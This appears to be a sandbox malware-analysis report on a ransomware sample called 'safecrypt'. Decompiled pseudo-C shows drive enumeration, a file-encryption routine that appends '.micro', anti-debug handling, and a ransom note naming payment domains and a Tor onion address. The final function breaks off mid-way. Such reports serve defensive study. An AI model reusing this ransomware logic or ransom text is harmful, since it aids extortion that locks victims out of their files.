                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00413A39,00440238,00000001), ref: 00413B65
                    • __wcsdup.LIBCMT ref: 00413DD9
                    • _free.LIBCMT ref: 00413E25
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00413E3B
                    • FindClose.KERNEL32(00000000), ref: 00413E4A
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.328968362.0000000000482000.00000040.00000001.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File_memset$CloseFirstNext__wcsdup_free
                    • String ID: .micro$PdG$\*.*$recove
                    • API String ID: 2758342554-1331407425
                    • Opcode ID: 55a62152aad37145335be79b4ad95aee0eb702fd5b6f2d6ef0c43730368e7e43
                    • Instruction ID: dd8138aa41fdac96c58e9b2fc9b18e225616ef6c43d0bb4751995cb4fe1b2c04
                    • Opcode Fuzzy Hash: 55a62152aad37145335be79b4ad95aee0eb702fd5b6f2d6ef0c43730368e7e43
                    • Instruction Fuzzy Hash: F6913972A0021566DB20EF609C42BEB3335AF24755F4045E6F909A6282F779EFC8C78C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E00413860() {
                    				signed int _v8;
                    				short _v1036;
                    				char _v1234;
                    				short _v1236;
                    				short _v1238;
                    				intOrPtr _v1242;
                    				intOrPtr _v1246;
                    				intOrPtr _v1250;
                    				intOrPtr _v1254;
                    				short _v1256;
                    				long _v1260;
                    				long _v1264;
                    				long _v1268;
                    				signed int _t35;
                    				intOrPtr _t38;
                    				WCHAR* _t45;
                    				WCHAR* _t46;
                    				int _t47;
                    				WCHAR* _t51;
                    				signed int _t53;
                    				WCHAR* _t55;
                    				intOrPtr* _t60;
                    				intOrPtr* _t61;
                    				short _t63;
                    				short _t64;
                    				short _t65;
                    				short _t67;
                    				short _t68;
                    				short* _t71;
                    				short _t72;
                    				short _t73;
                    				WCHAR* _t75;
                    				intOrPtr* _t76;
                    				long _t78;
                    				signed int _t79;
                    				signed int _t81;
                    				void* _t82;
                    				void* _t83;
                    				void* _t92;
                    
                    				_t81 = (_t79 & 0xfffffff8) - 0x4f4;
                    				_t35 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t35 ^ _t81;
                    				E004233B0(0x4401f8, 3);
                    				_t38 =  *0x43fed0; // 0x0
                    				_t78 = 0;
                    				_t82 = _t81 + 8;
                    				if( *((intOrPtr*)(_t38 + 4)) == 0) {
                    					L36:
                    					ExitThread(1);
                    				}
                    				GetLogicalDriveStringsW(0x100,  &_v1036);
                    				_t75 =  &_v1036;
                    				_v1236 = 0;
                    				E0042C770( &_v1234, 0, 0xc6);
                    				_t83 = _t82 + 0xc;
                    				_v1256 = 0;
                    				_v1254 = 0;
                    				_v1250 = 0;
                    				_v1246 = 0;
                    				_v1242 = 0;
                    				_v1238 = 0;
                    				_v1268 = 0;
                    				_v1264 = 0;
                    				_v1260 = 0;
                    				if(_v1036 == 0) {
                    					L33:
                    					E00413760(_t78);
                    					if( *0x440184 <= _t78) {
                    						goto L36;
                    					}
                    					_t76 = 0x440238;
                    					do {
                    						E00413AD0(_t76, 1);
                    						_t78 = _t78 + 1;
                    						_t83 = _t83 + 8;
                    						_t76 = _t76 + 0x800;
                    					} while (_t78 <  *0x440184);
                    					goto L36;
                    				} else {
                    					do {
                    						_t60 = L"A:\\";
                    						_t45 = _t75;
                    						while(1) {
                    							_t67 =  *_t45;
                    							if(_t67 !=  *_t60) {
                    								break;
                    							}
                    							if(_t67 == _t78) {
                    								L8:
                    								_t45 = 0;
                    								L10:
                    								_t46 = _t75;
                    								if(_t45 != _t78) {
                    									_t61 = L"B:\\";
                    									while(1) {
                    										_t68 =  *_t46;
                    										if(_t68 !=  *_t61) {
                    											break;
                    										}
                    										if(_t68 == _t78) {
                    											L19:
                    											_t46 = 0;
                    											L21:
                    											if(_t46 != _t78) {
                    												_t47 = GetDriveTypeW(_t75);
                    												if(_t47 == 3 || _t47 == 4 || _t47 == 2) {
                    													if(GetVolumeInformationW(_t75,  &_v1236, 0xc8,  &_v1268,  &_v1264,  &_v1260,  &_v1256, 0x14) == 1) {
                    														E00413AD0(_t75, _t50);
                    														_t83 = _t83 + 8;
                    													}
                    												}
                    												_t51 = _t75;
                    												_t71 =  &(_t51[1]);
                    												do {
                    													_t63 =  *_t51;
                    													_t51 =  &(_t51[1]);
                    												} while (_t63 != _t78);
                    												goto L32;
                    											}
                    											_t55 = _t75;
                    											_t71 =  &(_t55[1]);
                    											do {
                    												_t64 =  *_t55;
                    												_t55 =  &(_t55[1]);
                    											} while (_t64 != _t78);
                    											goto L32;
                    										}
                    										_t72 = _t46[1];
                    										if(_t72 !=  *((intOrPtr*)(_t61 + 2))) {
                    											break;
                    										}
                    										_t46 =  &(_t46[2]);
                    										_t61 = _t61 + 4;
                    										if(_t72 != _t78) {
                    											continue;
                    										}
                    										goto L19;
                    									}
                    									asm("sbb eax, eax");
                    									asm("sbb eax, 0xffffffff");
                    									goto L21;
                    								}
                    								_t71 =  &(_t46[1]);
                    								do {
                    									_t65 =  *_t46;
                    									_t46 =  &(_t46[1]);
                    								} while (_t65 != _t78);
                    								goto L32;
                    							}
                    							_t73 = _t45[1];
                    							if(_t73 !=  *((intOrPtr*)(_t60 + 2))) {
                    								break;
                    							}
                    							_t45 =  &(_t45[2]);
                    							_t60 = _t60 + 4;
                    							if(_t73 != _t78) {
                    								continue;
                    							}
                    							goto L8;
                    						}
                    						asm("sbb eax, eax");
                    						asm("sbb eax, 0xffffffff");
                    						goto L10;
                    						L32:
                    						_t53 = _t51 - _t71 >> 1;
                    						_t92 =  *(_t75 + 2 + _t53 * 2) - _t78;
                    						_t75 = _t75 + 2 + _t53 * 2;
                    					} while (_t92 != 0);
                    					goto L33;
                    				}
                    			}

                    APIs
                      • Part of subcall function 004233B0: GetTickCount.KERNEL32 ref: 004233C0
                      • Part of subcall function 004233B0: _rand.LIBCMT ref: 004233D0
                      • Part of subcall function 004233B0: Sleep.KERNELBASE(0000000F), ref: 004233F7
                    • GetLogicalDriveStringsW.KERNEL32(00000100,?), ref: 004138A9
                    • _memset.LIBCMT ref: 004138C8
                    • ExitThread.KERNEL32 ref: 00413A4D
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.328968362.0000000000482000.00000040.00000001.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountDriveExitLogicalSleepStringsThreadTick_memset_rand
                    • String ID: A:\$B:\
                    • API String ID: 470154913-1009255891
                    • Opcode ID: 623ae09593b2aaaa469b7905b0b7b864cbe1e7b879361cc1708776148165362a
                    • Instruction ID: 637fea9b3573a5559568184255e6e8a8f2455f6862f94a87ca8b0662e454bd76
                    • Opcode Fuzzy Hash: 623ae09593b2aaaa469b7905b0b7b864cbe1e7b879361cc1708776148165362a
                    • Instruction Fuzzy Hash: 705116B21102018BD735DF24C882AFBB2A5FF94B15F844A1BE08597390E7B5DBC4C79A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E004256D3(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                    				intOrPtr _v0;
                    				void* _v804;
                    				intOrPtr _v808;
                    				intOrPtr _v812;
                    				intOrPtr _t6;
                    				intOrPtr _t11;
                    				intOrPtr _t12;
                    				intOrPtr _t13;
                    				long _t17;
                    				intOrPtr _t21;
                    				intOrPtr _t22;
                    				intOrPtr _t25;
                    				intOrPtr _t26;
                    				intOrPtr _t27;
                    				intOrPtr* _t31;
                    				void* _t34;
                    
                    				_t27 = __esi;
                    				_t26 = __edi;
                    				_t25 = __edx;
                    				_t22 = __ecx;
                    				_t21 = __ebx;
                    				_t6 = __eax;
                    				_t34 = _t22 -  *0x43d01c; // 0xe0063daa
                    				if(_t34 == 0) {
                    					asm("repe ret");
                    				}
                    				 *0x43e878 = _t6;
                    				 *0x43e874 = _t22;
                    				 *0x43e870 = _t25;
                    				 *0x43e86c = _t21;
                    				 *0x43e868 = _t27;
                    				 *0x43e864 = _t26;
                    				 *0x43e890 = ss;
                    				 *0x43e884 = cs;
                    				 *0x43e860 = ds;
                    				 *0x43e85c = es;
                    				 *0x43e858 = fs;
                    				 *0x43e854 = gs;
                    				asm("pushfd");
                    				_pop( *0x43e888);
                    				 *0x43e87c =  *_t31;
                    				 *0x43e880 = _v0;
                    				 *0x43e88c =  &_a4;
                    				 *0x43e7c8 = 0x10001;
                    				_t11 =  *0x43e880; // 0x0
                    				 *0x43e77c = _t11;
                    				 *0x43e770 = 0xc0000409;
                    				 *0x43e774 = 1;
                    				_t12 =  *0x43d01c; // 0xe0063daa
                    				_v812 = _t12;
                    				_t13 =  *0x43d020; // 0x1ff9c255
                    				_v808 = _t13;
                    				 *0x43e7c0 = IsDebuggerPresent();
                    				_push(1);
                    				E0042BD80(_t14);
                    				SetUnhandledExceptionFilter(0);
                    				_t17 = UnhandledExceptionFilter("p�C");
                    				if( *0x43e7c0 == 0) {
                    					_push(1);
                    					E0042BD80(_t17);
                    				}
                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                    			}

                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 004269AA
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004269BF
                    • UnhandledExceptionFilter.KERNEL32(pC), ref: 004269CA
                    • GetCurrentProcess.KERNEL32(C0000409), ref: 004269E6
                    • TerminateProcess.KERNEL32(00000000), ref: 004269ED
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.328968362.0000000000482000.00000040.00000001.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                    • String ID: pC
                    • API String ID: 2579439406-3243261774
                    • Opcode ID: 0493313685780ae0ce296be0a983a6212c3911eaa44509a11c342e53e1a717ff
                    • Instruction ID: 332e7ea6ba5457cb4fea809ba2c2fce1ded50e1fbe9682d653700335dd9ef8e5
                    • Opcode Fuzzy Hash: 0493313685780ae0ce296be0a983a6212c3911eaa44509a11c342e53e1a717ff
                    • Instruction Fuzzy Hash: 0121AFB4902244DBE708EF27F8456947BF4FB08705F50697AE908872B0E7749982CF5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ....................$gfff
                    • API String ID: 0-3558827524
                    • Opcode ID: 0564a3c35e7526206c0d59ad9f969d706b830fd1fc9f2ddc4f602a9543d9929c
                    • Instruction ID: 98b8dc10b9cb77212152074cce9f87387e628b322ae6bcb3107b3beffe4dab0a
                    • Opcode Fuzzy Hash: 0564a3c35e7526206c0d59ad9f969d706b830fd1fc9f2ddc4f602a9543d9929c
                    • Instruction Fuzzy Hash: 24C1CF716483409BC314DF69D884A9BBBE4BFC8744F10492EF89987361E7B5D886CB86
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset
                    • String ID: gfff
                    • API String ID: 2102423945-1553575800
                    • Opcode ID: 558cd6eb2fd0452d968ec2a777368e8a447e8d58c6de9b5768359a8db8e806ee
                    • Instruction ID: e61a0dfbe5edf450485f8e1759707897340d4aa92b7094de9ba0fd8b92b25654
                    • Opcode Fuzzy Hash: 558cd6eb2fd0452d968ec2a777368e8a447e8d58c6de9b5768359a8db8e806ee
                    • Instruction Fuzzy Hash: B4A1BE71A483019FC314CF29DC84A6BBBE5AFC8314F14892EF889C7352E674D945CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0042B7C3() {
                    
                    				SetUnhandledExceptionFilter(E0042B781);
                    				return 0;
                    			}



                    0x0042b7c8
                    0x0042b7d0

                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_0002B781), ref: 0042B7C8
                    Memory Dump Source
                    • Source File: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.328968362.0000000000482000.00000040.00000001.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: dfdb0d2357c0cd46c004d6c91b5c0833340b8aa1958d13a1dd627f5cdc02a474
                    • Instruction ID: c0eddb95b0b60e64c1a8f1df41f0db4c86eaa527c24fe6535b8531239a93d15e
                    • Opcode Fuzzy Hash: dfdb0d2357c0cd46c004d6c91b5c0833340b8aa1958d13a1dd627f5cdc02a474
                    • Instruction Fuzzy Hash: 319002A0751151464B0017B06C5958526D0DBCC7127E11461A141C4465DB9540806599
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.328930565.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000002.328968362.0000000000482000.00000040.00000001.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3eb14fc0cbca45a70c31b7de64b001672f234fecf3c2a43ffec21a36382552d6
                    • Instruction ID: 40b950bec1a2c9b0a29e90db16b05e695cab0f4e20d93883a41e86a71c22e22b
                    • Opcode Fuzzy Hash: 3eb14fc0cbca45a70c31b7de64b001672f234fecf3c2a43ffec21a36382552d6
                    • Instruction Fuzzy Hash: 2B41B675A012298BCB24DF24D5587FEB3B1EF94300F6445EBD80AD7341EA789ED18B98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041EEE0(void* __edi) {
                    				char _v8;
                    				char _v12;
                    				void* __esi;
                    				intOrPtr _t40;
                    				intOrPtr* _t41;
                    				intOrPtr _t74;
                    				void* _t79;
                    				void* _t80;
                    				void* _t87;
                    				void* _t88;
                    				intOrPtr _t89;
                    				intOrPtr _t90;
                    				intOrPtr _t91;
                    				intOrPtr _t92;
                    				intOrPtr _t93;
                    				intOrPtr _t94;
                    				intOrPtr _t95;
                    				intOrPtr _t96;
                    				void* _t99;
                    				void* _t100;
                    
                    				_t86 = __edi;
                    				_t87 = 0;
                    				do {
                    					 *((intOrPtr*)(_t87 + 0x43fb18)) = E004258F2(_t79, __edi, _t87, 0x100);
                    					E0042C770(_t29, 0, 0x100);
                    					_t2 = _t87 + 0x43df08; // 0x434a0c
                    					_t3 = _t87 + 0x43fb18; // 0x0
                    					E00425A43( *_t3, 0x100,  *_t2);
                    					_t87 = _t87 + 4;
                    					_t99 = _t99 + 0x1c;
                    				} while (_t87 < 0x2f8);
                    				 *0x43f9dc = E004258F2(_t79, __edi, _t87, 0x100);
                    				 *0x43fb14 = E004258F2(_t79, __edi, _t87, 0x100);
                    				 *0x43fe10 = E004258F2(_t79, __edi, _t87, 0x100);
                    				 *0x43fb10 = E004258F2(_t79, __edi, _t87, 0x100);
                    				 *0x43fe14 = E004258F2(_t79, __edi, _t87, 0x100);
                    				 *0x43fe1c = E004258F2(_t79, _t86, _t87, 0x100);
                    				 *0x43fb0c = E004258F2(_t79, _t86, _t87, 0x100);
                    				_t40 = E004258F2(_t79, _t86, _t87, 0x100);
                    				_t100 = _t99 + 0x20;
                    				 *0x43fe18 = _t40;
                    				_t88 = 0;
                    				do {
                    					_t4 = _t88 + 0x43df08; // 0x434a0c
                    					_t41 =  *_t4;
                    					_t5 = _t41 + 1; // 0x434a0d
                    					_t80 = _t5;
                    					do {
                    						_t74 =  *_t41;
                    						_t41 = _t41 + 1;
                    					} while (_t74 != 0);
                    					_v12 = _t41 - _t80;
                    					_t8 = _t88 + 0x43fb18; // 0x0
                    					E004128B0( &_v12,  *_t8,  &_v12);
                    					_t88 = _t88 + 4;
                    					_t100 = _t100 + 8;
                    				} while (_t88 < 0x2f8);
                    				_t89 =  *0x43f9dc; // 0x0
                    				_v8 = 0x80;
                    				E0042E030(_t89, "ZVYyiyeK7fqE2k2HnBfsVr0DHF8XIAqu6AanwrnMsufMa9Irz/f5H5cioY5RIt9LS/Yb+rZlVypG2h1Om0yp0wRaBQqjB2juMoubm4b5xdxD8kEWab9YlDUv5AJf1G==", 0x80);
                    				E004128B0( &_v12, _t89,  &_v8);
                    				_t90 =  *0x43fb14; // 0x0
                    				_v8 = 0x60;
                    				E0042E030(_t90, "6X4tP/+zB4D/aPs1qQWJsZfCDCWrNPc+svEMvqsfBoZprMGIcGH8ikSBiuPfJjALYX92k6z+XYqREfLnVabGWW5ppgk1Ie==", 0x60);
                    				E004128B0( &_v8, _t90,  &_v8);
                    				_t91 =  *0x43fe10; // 0x0
                    				_v8 = 0x74;
                    				E0042E030(_t91, "qdyGPYZZSvdGicN98ZVXRKiFU9pmJbzkbreC29QzjHr/DNdk4j4+++06d8cyg8AYoAjEAxRflWawlywLIclSDa/baixBI4WnCwP4RLcTsT+oa88jRX6=", 0x74);
                    				E004128B0( &_v8, _t91,  &_v8);
                    				_t92 =  *0x43fb10; // 0x0
                    				_v8 = 0x74;
                    				E0042E030(_t92, "UQLFCdKQukVOHhxaAZ4bZ2E0ruT0B1rLn2EK7fufWff3zdrX81hEz9XxdqvEiJXlyPrm38HIXmFUBk9+wI+RC5chZUrDTHGo51hOw1921mvzZLgEFZO=", 0x74);
                    				E004128B0( &_v8, _t92,  &_v8);
                    				_t93 =  *0x43fe14; // 0x0
                    				_v8 = 0x60;
                    				E0042E030(_t93, "AaQ5vc2CWsL3h3L+HjQhm6yykARs471MboQDeuH2zbWHNFRYWGX0st20jUwKl4DmIVb1X332Oio6Q2VS/YsQg2qM7wgA58==", 0x60);
                    				E004128B0( &_v8, _t93,  &_v8);
                    				_t94 =  *0x43fe1c; // 0x0
                    				_v8 = 0x40;
                    				E0042E030(_t94, "4zSNFcBmKiiVtwCF3qiBepqETGwjDjaNvDWV168j6up/lIgtEi7bIVOPQwhd4q==", 0x40);
                    				E004128B0( &_v8, _t94,  &_v8);
                    				_t95 =  *0x43fb0c; // 0x0
                    				_v8 = 0x80;
                    				E0042E030(_t95, "0G1EJXDCpmMp6j5FF5PxDideqCApFKHQU2O8PeBznYYQNH0EDcOnM91I0SwDHUUDEEdjfWu945Y/wj+RyOmsBR1snTIRuqNPl+5DyZEHp565JkTwmhOcyf9D9QVdtV==", 0x80);
                    				E004128B0( &_v8, _t95,  &_v8);
                    				_t96 =  *0x43fe18; // 0x0
                    				_v8 = 0x40;
                    				E0042E030(_t96, "nIxIwVzr8swLXIvnBH/DM1mYMonC6p9cbdYrUPRSXSGdrr3k3AOrKkZ8fg6bkz==", 0x40);
                    				E004128B0( &_v8, _t96,  &_v8);
                    				_v8 = 0x648;
                    				 *0x460aac = E004258F2( &_v8, _t86, _t96, 0x3e80);
                    				E0042E030(_t63, "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", 0x648);
                    				E004128B0( &_v8, _t63,  &_v8);
                    				E00425D1D( *0x460aac, 0x3e80, "1. http://pot98bza3sgfjr35t.fausttime.com/%S\r\n2. http://h5534bvnrnkj345.maniupulp.com/%S\r\n3. http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%S\r\nIf for some reasons the addresses are not available, follow these steps:\r\n1. Download and install tor-browser: http://www.torproject.org/projects/torbrowser.html.en \r\n2. After a successful installation, run the browser and wait for initialization.\r\n3. Type in the address bar: wbozgklno6x2vfrk.onion/%S \r\n4. Follow the instructions on the site.\r\n\r\n!!! IMPORTANT INFORMATION:\r\n!!! Your personal pages:\r\nhttp://pot98bza3sgfjr35t.fausttime.com/%S\r\nhttp://h5534bvnrnkj345.maniupulp.com/%S\r\nhttp://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%S \r\n!!! Your personal page Tor-Browser: wbozgklno6x2vfrk.onion/%S \r\n!!! Your personal identification ID: %S\r\n\r\n");
                    				_v8 = 0x1734;
                    				 *0x4647bc = E004258F2( &_v8, _t86, _t63, 0x7d00);
                    				E0042E030(_t68, "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", 0x1734);
                    				E004128B0( &_v8, _t68,  &_v8);
                    				return E00425D1D( *0x4647bc, 0x7d00, "<!------111-111-111-1111-1111-111-111-111  --><b>1.<a href=\"http://pot98bza3sgfjr35t.fausttime.com/%S\"   target=\"_blank\">http://pot98bza3sgfjr35t.fausttime.com/%S</a></b><br>\n<!------111-111-111-1111-1111-111-111-111  --><b>2.<a href=\"http://h5534bvnrnkj345.maniupulp.com/%S\"   target=\"_blank\">http://h5534bvnrnkj345.maniupulp.com/%S</a></b><br>\n<!------111-111-111-1111-1111-111-111-111  --><b>3.<a href=\"http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%S\"   target=\"_blank\">http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%S</a></b><br>\n<!------111-111-111-1111-1111-111-111-111  --></div><br><div class=\"tb\" style=\"font-size:13px; border-color:#880000;\">If for some reasons the\n<!-----111-111-111-1111-1111-111-111-111  --> addresses are not available, <!------111-111-111-1111-1111-111-111-111  --> follow these steps: <hr>\n\n1. <!------111-111-111-1111-1111-111-111-111  -->  Download and <!------111-111-111-1111-1111-111-111-111  --> install tor-browser: \n<a href=\"http://www.torproject.org/projects/torbrowser.html.en\" target=\"_blank\">http://www.torproject.org/projects/torbrowser.html.en</a><br>\n2. <!---111-111-111-1111-1111-111-111-111  -->  After a successful<!------111-111-111-1111-1111-111-111-111  --> installation, run the browser and wait for initialization.<br>\n3. <!--- 111-111-111-1111-1111-111-111-111  --> Type<!-- 111-111-111-1111-1111-111-111-111  --> in<!-- 111-111-111-1111-1111-111-111-111  --> the tor-browser<!-- 111-111-111-1111-1111-111-111-111  --> address<!-- 111-111-111-1111-1111-111-111-111  --> bar: <font style=\"font-weight:bold; color:#009977;\"><!-- 111-111-111-1111-1111-111-111-111  -->wbozgklno6x2vfrk.onion/%S<!-- 111-111-111-1111-1111-111-111-111  --></font><!-- 111-111-111-1111-1111-111-111-111  --><br>\n4. <!--- 111-111-111-1111-1111-111-111-111  -->  Follow the instructions <!-- 111-111-111-1111-1111-111-111-111  --> on the site.</div><br><br><b>!!! 
IMPORTANT INFORMATION:</b><br>\n<div class=\"tb\" style=\"width:790px;\">\n\n\n<!-----111-111-111-1111-1111-111-111-111  --> Your Personal PAGES: \n<b><br> <a href=\"http://pot98bza3sgfjr35t.fausttime.com/%S\" target=\"_blank\">http://pot98bza3sgfjr35t.fausttime.com/%S</a> <br><a href=\"http://h5534bvnrnkj345.maniupulp.com/%S\" target=\"_blank\">http://h5534bvnrnkj345.maniupulp.com/%S</a> <br>\n<!-----111-111-111-1111-1111-111-111-111  --><a href=\"http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%S\" target=\"_blank\">http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%S</a>  <br> \n<!-----111-111-111-1111-1111-111-111-111  --> Your <!------111-111-111-1111-1111-111-111-111  --> Personal TOR-Browser<!-----111-111-111-1111-1111-111-111-111  --> page :\n<!-----111-111-111-1111-1111-111-111-111  --><font style=\"font-weight:bold; color:#009977;\"><!-- 111-111-111-1111-1111-111-111-111  -->wbozgklno6x2vfrk.onion/%S<!-- 111-111-111-1111-1111-111-111-111  --></font><br>\n<!-----111-111-111-1111-1111-111-111-111  --> Your personal <!------111-111-111-1111-1111-111-111-111  -->  ID \n<!-----111-111-111-1111-1111-111-111-111  -->  (if you open <!------111-111-111-1111-1111-111-111-111  --> the site directly):\n<!-----111-111-111-1111-1111-111-111-111  --> <font style=\"font-weight:bold; color:#770000;\">%S</font><br>\n</div></div></center></body></html>");
                    			}

                    APIs
                    Strings
                    • <!------111-111-111-1111-1111-111-111-111 --><b>1.<a href="http://pot98bza3sgfjr35t.fausttime.com/%S" target="_blank">http://pot98bza3sgfjr35t.fausttime.com/%S</a></b><br><!------111-111-111-1111-1111-111-111-111 --><b>2.<a href="http://h5534bvnrnkj345.ma, xrefs: 0041F19A
                    • 1. http://pot98bza3sgfjr35t.fausttime.com/%S2. http://h5534bvnrnkj345.maniupulp.com/%S3. http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%SIf for some reasons the addresses are not available, follow these steps:1. Download and install tor-browser: http://www, xrefs: 0041F14F
                    • @, xrefs: 0041F100
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _malloc$_memmove$_strcat_s$AllocateHeap_memset_strcpy_s
                    • API String ID: 117528677-1122571994
                    • Opcode ID: aaf68e94760a0c6315b4e77d2d6b0f531a22a6d22275d9d3b55923f48b7c6a5c
                    • Instruction ID: fba39216aa8ad76bab9a0180e87509054273618d21e965c64f2abc32d929e734
                    • Opcode Fuzzy Hash: aaf68e94760a0c6315b4e77d2d6b0f531a22a6d22275d9d3b55923f48b7c6a5c
                    • Instruction Fuzzy Hash: 086162B1E41320BAE700FBA2ED02F9E72689F08704F50856EF64467281DBFC6A1547DD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E00413E70(WCHAR* __ecx) {
                    				signed int _v8;
                    				char _v9;
                    				short _v11;
                    				intOrPtr _v12;
                    				short _v15;
                    				intOrPtr _v16;
                    				short _v19;
                    				intOrPtr _v20;
                    				short _v23;
                    				char _v24;
                    				char _v25;
                    				short _v27;
                    				short _v31;
                    				short _v35;
                    				short _v39;
                    				short _v43;
                    				short _v47;
                    				short _v51;
                    				short _v55;
                    				char _v56;
                    				char _v8250;
                    				short _v8252;
                    				char _v8500;
                    				long _v8504;
                    				short _v8508;
                    				short _v8512;
                    				short _v8516;
                    				void _v8520;
                    				void* _v8524;
                    				long _v8528;
                    				long _v8532;
                    				WCHAR* _v8536;
                    				intOrPtr _v8540;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t81;
                    				signed int _t91;
                    				long _t92;
                    				void* _t99;
                    				char _t101;
                    				intOrPtr _t102;
                    				signed int _t114;
                    				signed int _t122;
                    				signed int _t138;
                    				void* _t143;
                    				void* _t153;
                    				intOrPtr _t154;
                    				intOrPtr _t155;
                    				intOrPtr _t173;
                    				intOrPtr _t174;
                    				void* _t180;
                    				void* _t181;
                    				void* _t182;
                    				signed int _t183;
                    
                    				E0042DFB0(0x215c);
                    				_t81 =  *0x43d01c; // 0xe0063daa
                    				_v8 = _t81 ^ _t183;
                    				_t180 = __ecx;
                    				_v8536 = __ecx;
                    				_v8520 = 0;
                    				_v8516 = 0;
                    				_v8512 = 0;
                    				_v8508 = 0;
                    				_v8504 = 0;
                    				_v56 = 0;
                    				_v55 = 0;
                    				_v51 = 0;
                    				_v47 = 0;
                    				_v43 = 0;
                    				_v39 = 0;
                    				_v35 = 0;
                    				_v31 = 0;
                    				_v27 = 0;
                    				_v25 = 0;
                    				_v24 = 0;
                    				_v23 = 0;
                    				_v19 = 0;
                    				_v15 = 0;
                    				_v11 = 0;
                    				_v9 = 0;
                    				_v8528 = 0;
                    				_v8252 = 0;
                    				E0042C770( &_v8250, 0, 0x1ffe);
                    				_t171 =  &_v8252;
                    				E00425E0C( &_v8252, 0x1000, _t180, 0xffffffff);
                    				E0042613A( &_v8252, 0x1000, L".micro", 0xffffffff);
                    				_t182 = GetProcessHeap();
                    				if(_t182 == 0) {
                    					L18:
                    					_t40 =  &_v8; // 0x413e24
                    					return E004256D3(_t88 | 0xffffffff, _t143,  *_t40 ^ _t183, _t171, _t180, _t182);
                    				} else {
                    					_t88 = GetFileAttributesW(_t180);
                    					if(_t88 == 0xffffffff) {
                    						goto L18;
                    					} else {
                    						if((_t88 & 0x00000001) != 0) {
                    							SetFileAttributesW(_t180, _t88 & 0xfffffffe);
                    						}
                    						_t180 = CreateFileW(_t180, 0xc0000000, 0, 0, 3, 0x80, 0);
                    						if(_t180 == 0xffffffff) {
                    							goto L18;
                    						} else {
                    							_t91 = GetFileSize(_t180, 0);
                    							_v8524 = _t91;
                    							if(_t91 == 0xffffffff || _t91 == 0 || _t91 < 0x20 || _t91 > 0x13800000) {
                    								L17:
                    								_t88 = CloseHandle(_t180);
                    								goto L18;
                    							} else {
                    								_t171 = _t91 & 0x0000000f;
                    								_t92 = _t91 + 0x10;
